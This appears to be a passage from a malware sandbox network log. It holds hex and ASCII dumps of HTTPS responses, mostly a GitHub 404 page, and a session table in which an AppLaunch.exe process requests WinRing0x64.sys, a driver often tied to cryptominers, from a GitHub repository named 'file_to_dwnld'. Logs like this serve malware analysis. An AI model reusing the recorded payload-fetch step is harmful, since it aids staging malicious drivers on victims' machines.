                                X-Frame-Options: deny
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 0
                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                2024-09-04 23:45:44 UTC3310INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                2024-09-04 23:45:44 UTC327INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                2024-09-04 23:45:44 UTC1370INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65
                                Data Ascii: " href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubasse
                                2024-09-04 23:45:44 UTC1370INData Raw: 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 66 64 35 34 39 39 38 34 38 39 38 35 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66
                                Data Ascii: ntrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href
                                2024-09-04 23:45:44 UTC1370INData Raw: 6f 6d 70 6c 65 74 69 6f 6e 5f 6e 65 77 5f 64 6f 6d 61 69 6e 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 61 6c 5f 75 78 5f 68 69 73 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 70 79 5f 6d 65 73 73 61 67 65 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f
                                Data Ascii: ompletion_new_domain","copilot_conversational_ux_history_refs","copilot_copy_message","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_
                                2024-09-04 23:45:44 UTC285INData Raw: 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 39 32 34 65 36 30 62 63 61 37 64 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f
                                Data Ascii: defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-924e60bca7d2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_mo
                                2024-09-04 23:45:44 UTC1370INData Raw: 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                Data Ascii: _dist_index_esm_js-f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><
                                2024-09-04 23:45:44 UTC1370INData Raw: 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 2d 33 65 66 64 61 33 2d 37 30 31 61 63 62 36 39 31 39 33 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65
                                Data Ascii: -events_dist_in-3efda3-701acb69193f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_re
                                2024-09-04 23:45:44 UTC1370INData Raw: 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 37 39 30 31 65 37 2d 64 63 38 38 35 38 37 63 31 34 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20
                                Data Ascii: script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-7901e7-dc88587c14ed.js"></script><script
                                2024-09-04 23:45:44 UTC1370INData Raw: 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 64 69 73 74 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 6f 74 6b 65 79 2d 31 61 31 64 39 31 2d 66 61 39 66 32 39 61 38 35 31 34 62 2e 6a 73 22 3e 3c
                                Data Ascii: 8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d91-fa9f29a8514b.js"><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449740140.82.121.3443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                TimestampBytes transferredDirectionData
                                2024-09-04 23:45:44 UTC109OUTGET /S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys HTTP/1.1
                                Host: github.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:44 UTC473INHTTP/1.1 404 Not Found
                                Server: GitHub.com
                                Date: Wed, 04 Sep 2024 23:45:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                X-Frame-Options: deny
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 0
                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                2024-09-04 23:45:44 UTC3308INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                2024-09-04 23:45:44 UTC329INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                2024-09-04 23:45:44 UTC1370INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73
                                Data Ascii: href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets
                                2024-09-04 23:45:44 UTC1370INData Raw: 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 66 64 35 34 39 39 38 34 38 39 38 35 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22
                                Data Ascii: rast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="
                                2024-09-04 23:45:44 UTC1370INData Raw: 70 6c 65 74 69 6f 6e 5f 6e 65 77 5f 64 6f 6d 61 69 6e 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 61 6c 5f 75 78 5f 68 69 73 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 70 79 5f 6d 65 73 73 61 67 65 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f 6d 61
                                Data Ascii: pletion_new_domain","copilot_conversational_ux_history_refs","copilot_copy_message","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_ma
                                2024-09-04 23:45:44 UTC1370INData Raw: 62 30 33 30 64 33 61 63 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 39 32 34 65 36 30 62 63 61 37 64 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                Data Ascii: b030d3acc.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-924e60bca7d2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                2024-09-04 23:45:44 UTC1370INData Raw: 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 63 64 34 38 32 32 30 64 37 34 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                Data Ascii: on/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-cd48220d74d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubass
                                2024-09-04 23:45:44 UTC1370INData Raw: 38 35 36 32 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 35 30 38 61 34 35 63 61 32 33 63 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                Data Ascii: 85620.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-508a45ca23c6.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                2024-09-04 23:45:44 UTC1370INData Raw: 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 35 38 65 30 34 33 66 63 66 37 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65
                                Data Ascii: ithub.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_module
                                2024-09-04 23:45:44 UTC1370INData Raw: 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 71 75 6f 74 65 2d 73 65 6c 65 63 74 69 6f 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 61 72 65 61 2d 61 75 74 6f 73 69 2d 39 65 30 33 34 39 2d 35 30 30 33 61 61 65 62 61 33 35 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d
